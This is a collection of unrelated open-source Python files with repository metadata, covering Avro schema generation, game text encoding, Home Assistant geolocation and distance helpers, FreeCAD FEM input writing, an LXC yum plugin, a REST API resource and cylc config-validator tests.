nodes = []
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
nodes.append(node)
return choice(nodes)
def _generate_rest(self):
while self._num_scalars_created < self._target_num_scalars:
node = self._get_random_existing_node()
node.fields.append(self._create_random_node())
self._finalize()
def _generate_trunk(self):
cur = self.root
for i in range(self._target_depth):
new_node = self._create_random_node()
self._nodes.append(new_node)
cur.fields.append(new_node)
cur = new_node
def _finalize(self):
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
node.fields.append(choice(SCALAR_TYPES))
shuffle(node.fields)
def create_tree(self):
self.root = Node(randint(1, MAX_NUM_STRUCT_FIELDS), 'struct')
self._nodes = [self.root]
self._num_scalars_created = self.root.num_fields
self._generate_trunk()
self._generate_rest()
return self.root
class AvroGenerator(object):
def __init__(self, schema_tree_generator):
self.cur_id = 0
self._schema_tree_generator = schema_tree_generator
def _next_id(self):
self.cur_id += 1
return str(self.cur_id)
def clear_state(self):
self.cur_id = 0
def create(self, table_name):
tree_root = self._schema_tree_generator.create_tree()
result = {}
result['type'] = 'record'
result['namespace'] = 'org.apache.impala'
result['name'] = table_name
result['fields'] = self._convert_struct_fields(tree_root.fields)
return result
def _convert_struct_fields(self, fields):
return [self._convert_struct_field(field) for field in fields]
def _convert_struct_field(self, struct_field_node):
result = {}
result['type'] = self._convert_node(struct_field_node)
result['name'] = 'field_' + self._next_id()
return result
def _convert_node(self, node):
if isinstance(node, str):
result = node
elif node.node_type == 'array':
result = self._convert_array(node)
elif node.node_type == 'map':
result = self._convert_map(node)
elif node.node_type == 'struct':
result = self._convert_struct(node)
else:
assert False, 'Unknown type: ' + node.node_types
if random() < NULL_CHANCE:
# Make it nullable
return ['null', result]
else:
return result
def _convert_array(self, array_node):
result = {}
result['type'] = 'array'
result['items'] = self._convert_node(array_node.fields[0])
return result
def _convert_map(self, map_node):
result = {}
result['type'] = 'map'
result['values'] = self._convert_node(map_node.fields[0])
return result
def _convert_struct(self, struct_node):
result = {}
result['type'] = 'record'
result['name'] = 'struct_' + self._next_id()
result['fields'] = self._convert_struct_fields(struct_node.fields)
return result
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('--target_dir', default='/tmp',
help='Directory where the avro schemas will be saved.')
parser.add_option('--num_tables', default='4', type='int',
help='Number of schemas to generate.')
parser.add_option('--num_scalars', default='10', type='int',
help='Number of schemas to generate.')
parser.add_option('--nesting_depth', default='3', type='int',
help='Number of schemas to generate.')
parser.add_option('--base_table_name', default='table_',
help='Base table name.')
options, args = parser.parse_args()
schema_generator = SchemaTreeGenerator(target_num_scalars=options.num_scalars,
target_depth=options.nesting_depth)
writer = AvroGenerator(schema_generator)
for table_num in range(options.num_tables):
writer.clear_state()
table_name = options.base_table_name + str(table_num)
json_result = writer.create(table_name)
file_path = join_path(options.target_dir, table_name + '.avsc')
with open(file_path, 'w') as f:
json.dump(json_result, f, indent=2, sort_keys=True)
|
michaelhkw/incubator-impala
|
testdata/bin/random_avro_schema.py
|
Python
|
apache-2.0
| 6,014
| 0.00981
|
def standard_text_from_block(block, offset, max_length):
str = ''
for i in range(offset, offset + max_length):
c = block[i]
if c == 0:
return str
else:
str += chr(c - 0x30)
return str
def standard_text_to_byte_list(text, max_length):
byte_list = []
text_pos = 0
while text_pos < len(text):
c = text[text_pos]
if c == '[':
end_bracket_pos = text.find(']', text_pos)
if end_bracket_pos == -1:
raise ValueError("String contains '[' at position {} but no subsequent ']': {}".format(
text_pos, text
))
bracket_bytes = text[text_pos+1:end_bracket_pos].split()
for bracket_byte in bracket_bytes:
if len(bracket_byte) != 2:
raise ValueError("String contains invalid hex number '{}', must be two digits: {}".format(
bracket_byte, text
))
try:
bracket_byte_value = int(bracket_byte, 16)
except ValueError as e:
raise ValueError("String contains invalid hex number '{}': {}".format(
bracket_byte, text
), e)
byte_list.append(bracket_byte_value)
text_pos = end_bracket_pos + 1
else:
byte_list.append(ord(c) + 0x30)
text_pos += 1
num_bytes = len(byte_list)
if num_bytes > max_length:
raise ValueError("String cannot be written in {} bytes or less: {}".format(
max_length, text
))
elif num_bytes < max_length:
byte_list.append(0)
return byte_list
def standard_text_to_block(block, offset, text, max_length):
byte_list = standard_text_to_byte_list(text, max_length)
block[offset:offset+len(byte_list)] = byte_list
|
johnreswebpro/CoilSnake
|
coilsnake/util/eb/text.py
|
Python
|
gpl-3.0
| 1,914
| 0.002612
|
INSTALL_PATH = '/home/fred/workspace/grafeo/'
|
fredmorcos/attic
|
projects/grafeo/attic/grafeo_20100227_python/grafeo/config/Config.py
|
Python
|
isc
| 46
| 0
|
"""
Module with location helpers.
detect_location_info and elevation are mocked by default during tests.
"""
import asyncio
import collections
import math
from typing import Any, Dict, Optional, Tuple
import aiohttp
ELEVATION_URL = "https://api.open-elevation.com/api/v1/lookup"
IP_API = "http://ip-api.com/json"
IPAPI = "https://ipapi.co/json/"
# Constants from https://github.com/maurycyp/vincenty
# Earth ellipsoid according to WGS 84
# Axis a of the ellipsoid (Radius of the earth in meters)
AXIS_A = 6378137
# Flattening f = (a-b) / a
FLATTENING = 1 / 298.257223563
# Axis b of the ellipsoid in meters.
AXIS_B = 6356752.314245
MILES_PER_KILOMETER = 0.621371
MAX_ITERATIONS = 200
CONVERGENCE_THRESHOLD = 1e-12
LocationInfo = collections.namedtuple(
"LocationInfo",
[
"ip",
"country_code",
"country_name",
"region_code",
"region_name",
"city",
"zip_code",
"time_zone",
"latitude",
"longitude",
"use_metric",
],
)
async def async_detect_location_info(
session: aiohttp.ClientSession,
) -> Optional[LocationInfo]:
"""Detect location information."""
data = await _get_ipapi(session)
if data is None:
data = await _get_ip_api(session)
if data is None:
return None
data["use_metric"] = data["country_code"] not in ("US", "MM", "LR")
return LocationInfo(**data)
def distance(
lat1: Optional[float], lon1: Optional[float], lat2: float, lon2: float
) -> Optional[float]:
"""Calculate the distance in meters between two points.
Async friendly.
"""
if lat1 is None or lon1 is None:
return None
result = vincenty((lat1, lon1), (lat2, lon2))
if result is None:
return None
return result * 1000
# Author: https://github.com/maurycyp
# Source: https://github.com/maurycyp/vincenty
# License: https://github.com/maurycyp/vincenty/blob/master/LICENSE
# pylint: disable=invalid-name
def vincenty(
point1: Tuple[float, float], point2: Tuple[float, float], miles: bool = False
) -> Optional[float]:
"""
Vincenty formula (inverse method) to calculate the distance.
Result in kilometers or miles between two points on the surface of a
spheroid.
Async friendly.
"""
# short-circuit coincident points
if point1[0] == point2[0] and point1[1] == point2[1]:
return 0.0
U1 = math.atan((1 - FLATTENING) * math.tan(math.radians(point1[0])))
U2 = math.atan((1 - FLATTENING) * math.tan(math.radians(point2[0])))
L = math.radians(point2[1] - point1[1])
Lambda = L
sinU1 = math.sin(U1)
cosU1 = math.cos(U1)
sinU2 = math.sin(U2)
cosU2 = math.cos(U2)
for _ in range(MAX_ITERATIONS):
sinLambda = math.sin(Lambda)
cosLambda = math.cos(Lambda)
sinSigma = math.sqrt(
(cosU2 * sinLambda) ** 2 + (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) ** 2
)
if sinSigma == 0.0:
return 0.0 # coincident points
cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda
sigma = math.atan2(sinSigma, cosSigma)
sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma
cosSqAlpha = 1 - sinAlpha ** 2
try:
cos2SigmaM = cosSigma - 2 * sinU1 * sinU2 / cosSqAlpha
except ZeroDivisionError:
cos2SigmaM = 0
C = FLATTENING / 16 * cosSqAlpha * (4 + FLATTENING * (4 - 3 * cosSqAlpha))
LambdaPrev = Lambda
Lambda = L + (1 - C) * FLATTENING * sinAlpha * (
sigma
+ C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM ** 2))
)
if abs(Lambda - LambdaPrev) < CONVERGENCE_THRESHOLD:
break # successful convergence
else:
return None # failure to converge
uSq = cosSqAlpha * (AXIS_A ** 2 - AXIS_B ** 2) / (AXIS_B ** 2)
A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)))
B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)))
deltaSigma = (
B
* sinSigma
* (
cos2SigmaM
+ B
/ 4
* (
cosSigma * (-1 + 2 * cos2SigmaM ** 2)
- B
/ 6
* cos2SigmaM
* (-3 + 4 * sinSigma ** 2)
* (-3 + 4 * cos2SigmaM ** 2)
)
)
)
s = AXIS_B * A * (sigma - deltaSigma)
s /= 1000 # Conversion of meters to kilometers
if miles:
s *= MILES_PER_KILOMETER # kilometers to miles
return round(s, 6)
async def _get_ipapi(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ipapi.co for location data."""
try:
resp = await session.get(IPAPI, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("ip"),
"country_code": raw_info.get("country"),
"country_name": raw_info.get("country_name"),
"region_code": raw_info.get("region_code"),
"region_name": raw_info.get("region"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("postal"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("latitude"),
"longitude": raw_info.get("longitude"),
}
async def _get_ip_api(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ip-api.com for location data."""
try:
resp = await session.get(IP_API, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("query"),
"country_code": raw_info.get("countryCode"),
"country_name": raw_info.get("country"),
"region_code": raw_info.get("region"),
"region_name": raw_info.get("regionName"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("zip"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("lat"),
"longitude": raw_info.get("lon"),
}
|
leppa/home-assistant
|
homeassistant/util/location.py
|
Python
|
apache-2.0
| 6,274
| 0.000956
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: jernej@reciprocitylabs.com
# Maintained By: jernej@reciprocitylabs.com
from lib import environment
from lib.constants import url
from lib.page.widget.base import Widget
class AdminPeople(Widget):
URL = environment.APP_URL \
+ url.ADMIN_DASHBOARD \
+ url.Widget.PEOPLE
|
jmakov/ggrc-core
|
test/selenium/src/lib/page/widget/admin_people.py
|
Python
|
apache-2.0
| 457
| 0.002188
|
# ***************************************************************************
# * *
# * Copyright (c) 2016 - Bernd Hahnebach <bernd@bimstatik.org> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
'''
- next step would be save the constraints node and element data in the in the FreeCAD FEM Mesh Object
and link them to the appropriate constraint object
- if the informations are used by the FEM Mesh file exporter FreeCAD would support writing FEM Mesh Groups
- which is a most needed feature of FEM module
- smesh supports mesh groups, how about pythonbinding in FreeCAD. Is there somethin implemented allready?
'''
__title__ = "FemInputWriter"
__author__ = "Bernd Hahnebach"
__url__ = "http://www.freecadweb.org"
import FreeCAD
import FemMeshTools
import os
class FemInputWriter():
def __init__(self,
analysis_obj, solver_obj,
mesh_obj, matlin_obj, matnonlin_obj,
fixed_obj, displacement_obj,
contact_obj, planerotation_obj, transform_obj,
selfweight_obj, force_obj, pressure_obj,
temperature_obj, heatflux_obj, initialtemperature_obj,
beamsection_obj, shellthickness_obj,
analysis_type, dir_name
):
self.analysis = analysis_obj
self.solver_obj = solver_obj
self.mesh_object = mesh_obj
self.material_objects = matlin_obj
self.material_nonlinear_objects = matnonlin_obj
self.fixed_objects = fixed_obj
self.displacement_objects = displacement_obj
self.contact_objects = contact_obj
self.planerotation_objects = planerotation_obj
self.transform_objects = transform_obj
self.selfweight_objects = selfweight_obj
self.force_objects = force_obj
self.pressure_objects = pressure_obj
self.temperature_objects = temperature_obj
self.heatflux_objects = heatflux_obj
self.initialtemperature_objects = initialtemperature_obj
self.beamsection_objects = beamsection_obj
self.shellthickness_objects = shellthickness_obj
self.analysis_type = analysis_type
self.dir_name = dir_name
if not dir_name:
print('Error: FemInputWriter has no working_dir --> we gone make a temporary one!')
self.dir_name = FreeCAD.ActiveDocument.TransientDir.replace('\\', '/') + '/FemAnl_' + analysis_obj.Uid[-4:]
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
self.fc_ver = FreeCAD.Version()
self.ccx_eall = 'Eall'
self.ccx_elsets = []
self.femmesh = self.mesh_object.FemMesh
self.femnodes_mesh = {}
self.femelement_table = {}
self.constraint_conflict_nodes = []
def get_constraints_fixed_nodes(self):
# get nodes
for femobj in self.fixed_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_displacement_nodes(self):
# get nodes
for femobj in self.displacement_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_planerotation_nodes(self):
# get nodes
for femobj in self.planerotation_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_transform_nodes(self):
# get nodes
for femobj in self.transform_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_temperature_nodes(self):
# get nodes
for femobj in self.temperature_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_force_nodeloads(self):
# check shape type of reference shape
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
# in GUI defined frc_obj all ref_shape have the same shape type
# TODO in FemTools: check if all RefShapes really have the same type an write type to dictionary
femobj['RefShapeType'] = ''
if frc_obj.References:
first_ref_obj = frc_obj.References[0]
first_ref_shape = first_ref_obj[0].Shape.getElement(first_ref_obj[1][0])
femobj['RefShapeType'] = first_ref_shape.ShapeType
else:
# frc_obj.References could be empty ! # TODO in FemTools: check
FreeCAD.Console.PrintError('At least one Force Object has empty References!\n')
if femobj['RefShapeType'] == 'Vertex':
# print("load on vertices --> we do not need the femelement_table and femnodes_mesh for node load calculation")
pass
elif femobj['RefShapeType'] == 'Face' and FemMeshTools.is_solid_femmesh(self.femmesh) and not FemMeshTools.has_no_face_data(self.femmesh):
# print("solid_mesh with face data --> we do not need the femelement_table but we need the femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
else:
# print("mesh without needed data --> we need the femelement_table and femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
if not self.femelement_table:
self.femelement_table = FemMeshTools.get_femelement_table(self.femmesh)
# get node loads
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
if frc_obj.Force == 0:
print(' Warning --> Force = 0')
if femobj['RefShapeType'] == 'Vertex': # point load on vertieces
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_vertex_nodeload_table(self.femmesh, frc_obj)
elif femobj['RefShapeType'] == 'Edge': # line load on edges
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_edge_nodeload_table(self.femmesh, self.femelement_table, self.femnodes_mesh, frc_obj)
elif femobj['RefShapeType'] == 'Face': # area load on faces
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_face_nodeload_table(self.femmesh, self.femelement_table, self.femnodes_mesh, frc_obj)
def get_constraints_pressure_faces(self):
# TODO see comments in get_constraints_force_nodeloads(), it applies here too. Mhh it applies to all constraints ...
# get the faces and face numbers
for femobj in self.pressure_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['PressureFaces'] = FemMeshTools.get_pressure_obj_faces(self.femmesh, femobj)
# print femobj['PressureFaces']
|
wood-galaxy/FreeCAD
|
src/Mod/Fem/FemInputWriter.py
|
Python
|
lgpl-2.1
| 9,277
| 0.003557
|
"""
The extropy
"""
from ..helpers import RV_MODES
from ..math.ops import get_ops
import numpy as np
def extropy(dist, rvs=None, rv_mode=None):
"""
Returns the extropy J[X] over the random variables in `rvs`.
If the distribution represents linear probabilities, then the extropy
is calculated with units of 'bits' (base-2).
Parameters
----------
dist : Distribution or float
The distribution from which the extropy is calculated. If a float,
then we calculate the binary extropy.
rvs : list, None
The indexes of the random variable used to calculate the extropy.
If None, then the extropy is calculated over all random variables.
This should remain `None` for ScalarDistributions.
rv_mode : str, None
Specifies how to interpret the elements of `rvs`. Valid options are:
{'indices', 'names'}. If equal to 'indices', then the elements of
`rvs` are interpreted as random variable indices. If equal to 'names',
the the elements are interpreted as random variable names. If `None`,
then the value of `dist._rv_mode` is consulted.
Returns
-------
J : float
The extropy of the distribution.
"""
try:
# Handle binary extropy.
float(dist)
except TypeError:
pass
else:
# Assume linear probability for binary extropy.
import dit
dist = dit.ScalarDistribution([dist, 1-dist])
rvs = None
rv_mode = RV_MODES.INDICES
if dist.is_joint():
if rvs is None:
# Set to entropy of entire distribution
rvs = list(range(dist.outcome_length()))
rv_mode = RV_MODES.INDICES
d = dist.marginal(rvs, rv_mode=rv_mode)
else:
d = dist
pmf = d.pmf
if d.is_log():
base = d.get_base(numerical=True)
npmf = d.ops.log(1-d.ops.exp(pmf))
terms = -base**npmf * npmf
else:
# Calculate entropy in bits.
log = get_ops(2).log
npmf = 1 - pmf
terms = -npmf * log(npmf)
J = np.nansum(terms)
return J
|
chebee7i/dit
|
dit/other/extropy.py
|
Python
|
bsd-3-clause
| 2,122
| 0.000471
|
# Yum plugin to re-patch container rootfs after a yum update is done
#
# Copyright (C) 2012 Oracle
#
# Authors:
# Dwight Engen <dwight.engen@oracle.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import os
from fnmatch import fnmatch
from yum.plugins import TYPE_INTERACTIVE
from yum.plugins import PluginYumExit
requires_api_version = '2.0'
plugin_type = (TYPE_INTERACTIVE,)
def posttrans_hook(conduit):
pkgs = []
patch_required = False
# If we aren't root, we can't have updated anything
if os.geteuid():
return
# See what packages have files that were patched
confpkgs = conduit.confString('main', 'packages')
if not confpkgs:
return
tmp = confpkgs.split(",")
for confpkg in tmp:
pkgs.append(confpkg.strip())
conduit.info(2, "lxc-patch: checking if updated pkgs need patching...")
ts = conduit.getTsInfo()
for tsmem in ts.getMembers():
for pkg in pkgs:
if fnmatch(pkg, tsmem.po.name):
patch_required = True
if patch_required:
conduit.info(2, "lxc-patch: patching container...")
os.spawnlp(os.P_WAIT, "lxc-patch", "lxc-patch", "--patch", "/")
|
czchen/debian-lxc
|
config/yum/lxc-patch.py
|
Python
|
lgpl-2.1
| 1,850
| 0.000541
|
# -*- coding: utf-8 -*-
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
# snippy - software development and maintenance notes manager.
# Copyright 2017-2020 Heikki J. Laaksonen <laaksonen.heikki.j@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""api_fields: JSON REST API for resource attributes."""
from snippy.cause import Cause
from snippy.config.config import Config
from snippy.config.source.api import Api
from snippy.constants import Constants as Const
from snippy.logger import Logger
from snippy.server.rest.base import ApiResource
from snippy.server.rest.base import ApiNotImplemented
from snippy.server.rest.generate import Generate
class ApiAttributes(object):
"""Access unique resource attributes."""
def __init__(self, content):
self._logger = Logger.get_logger(__name__)
self._category = content.category
self._content = content
@Logger.timeit(refresh_oid=True)
def on_get(self, request, response):
"""Search unique resource attributes.
Search is made from all content categories by default.
Args:
request (obj): Falcon Request().
response (obj): Falcon Response().
"""
self._logger.debug('run: %s %s', request.method, request.uri)
if 'scat' not in request.params:
request.params['scat'] = Const.CATEGORIES
api = Api(self._category, Api.UNIQUE, request.params)
Config.load(api)
self._content.run()
if not self._content.uniques:
Cause.push(Cause.HTTP_NOT_FOUND, 'cannot find unique fields for %s attribute' % self._category)
if Cause.is_ok():
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.fields(self._category, self._content.uniques, request, response)
response.status = Cause.http_status()
else:
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.error(Cause.json_message())
response.status = Cause.http_status()
Cause.reset()
self._logger.debug('end: %s %s', request.method, request.uri)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_post(request, response):
"""Create new field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_put(request, response):
"""Change field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_delete(request, response):
"""Delete field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_options(_, response):
"""Respond with allowed methods."""
response.status = Cause.HTTP_200
response.set_header('Allow', 'GET,OPTIONS')
|
heilaaks/snippy
|
snippy/server/rest/api_fields.py
|
Python
|
agpl-3.0
| 3,524
| 0.000568
|
# THIS FILE IS PART OF THE CYLC WORKFLOW ENGINE.
# Copyright (C) NIWA & British Crown (Met Office) & Contributors.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Unit Tests for cylc.flow.parsec.validate.ParsecValidator.coerce methods."""
from typing import List
import pytest
from pytest import approx
from cylc.flow.parsec.config import ConfigNode as Conf
from cylc.flow.parsec.OrderedDict import OrderedDictWithDefaults
from cylc.flow.parsec.exceptions import IllegalValueError
from cylc.flow.parsec.validate import (
CylcConfigValidator as VDR,
DurationFloat,
ListValueError,
IllegalItemError,
ParsecValidator,
parsec_validate
)
@pytest.fixture
def sample_spec():
with Conf('myconf') as myconf:
with Conf('section1'):
Conf('value1', default='')
Conf('value2', default='what?')
with Conf('section2'):
Conf('enabled', VDR.V_BOOLEAN)
with Conf('section3'):
Conf('title', default='default', options=['1', '2'])
Conf(
'amounts',
VDR.V_INTEGER_LIST,
default=[1, 2, 3],
# options=[[1, 2, 3]]
)
with Conf('entries'):
Conf('key')
Conf('value')
with Conf('<whatever>'):
Conf('section300000', default='')
Conf('ids', VDR.V_INTEGER_LIST)
return myconf
@pytest.fixture
def validator_invalid_values():
"""
Data provider or invalid values for parsec validator. All values must not
be null (covered elsewhere), and not dict's.
Possible invalid scenarios must include:
- cfg[key] is a list AND a value is not in list of the possible values
- OR
- cfg[key] is not a list AND cfg[key] not in the list of possible values
:return: a list with sets of tuples for the test parameters
:rtype: list
"""
values = []
# variables reused throughout
spec = None
msg = None
# set 1 (t, f, f, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 3"
msg = None
values.append((spec, cfg, msg))
# set 2 (t, t, f, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 5"
msg = '(type=option) value = [1, 2, 5]'
values.append((spec, cfg, msg))
# set 3 (f, f, t, f)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "2"
msg = None
values.append((spec, cfg, msg))
# set 4 (f, f, t, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "5"
msg = '(type=option) value = 5'
values.append((spec, cfg, msg))
return values
@pytest.fixture
def strip_and_unquote_list():
return [
[
'"a,b", c, "d e"', # input
["a,b", "c", "d e"] # expected
],
[
'foo bar baz', # input
["foo bar baz"] # expected
],
[
'"a", \'b\', c', # input
["a", "b", "c"] # expected
],
[
'a b c, d e f', # input
["a b c", "d e f"] # expected
],
]
def test_list_value_error():
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = ListValueError(keys, value, "who cares")
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (who cares)'
assert expected == output
def test_list_value_error_with_exception():
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = ListValueError(keys, value, "who cares", exc)
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (test: who cares)'
assert expected == output
def test_illegal_value_error():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = IllegalValueError(value_type, keys, value)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value"
assert expected == output
def test_illegal_value_error_with_exception():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = IllegalValueError(value_type, keys, value, exc)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value - (test)"
assert expected == output
def test_illegal_item_error():
keys = ['a,', 'b', 'c']
key = 'a sample value'
error = IllegalItemError(keys, key)
output = str(error)
expected = "[a,][b][c]a sample value"
assert expected == output
def test_illegal_item_error_message():
keys = ['a,', 'b', 'c']
key = 'a sample value'
message = "invalid"
error = IllegalItemError(keys, key, message)
output = str(error)
expected = "[a,][b][c]a sample value - (invalid)"
assert expected == output
def test_parsec_validator_invalid_key(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_no_spec(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
# remove the user-defined section from the spec
sample_spec._children = {
key: value
for key, value in sample_spec._children.items()
if key != '__MANY__'
}
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_with_many_spaces(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section 3000000'] = 'test'
with pytest.raises(IllegalItemError) as cm:
parsec_validator.validate(cfg, sample_spec)
assert str(cm.exception) == "section 3000000 - (consecutive spaces)"
def test_parsec_validator_invalid_key_with_many_invalid_values(
validator_invalid_values
):
for spec, cfg, msg in validator_invalid_values:
parsec_validator = ParsecValidator()
if msg is not None:
with pytest.raises(IllegalValueError) as cm:
parsec_validator.validate(cfg, spec)
assert msg == str(cm.value)
else:
# cylc.flow.parsec_validator.validate(cfg, spec)
# let's use the alias `parsec_validate` here
parsec_validate(cfg, spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator_invalid_key_with_many_1(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section3000000'] = OrderedDictWithDefaults()
parsec_validator.validate(cfg, sample_spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator_invalid_key_with_many_2(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section3'] = OrderedDictWithDefaults()
cfg['section3']['title'] = '1'
cfg['section3']['entries'] = OrderedDictWithDefaults()
cfg['section3']['entries']['key'] = 'name'
cfg['section3']['entries']['value'] = "1, 2, 3, 4"
parsec_validator.validate(cfg, sample_spec)
# TBD assertIsNotNone when 2.6+
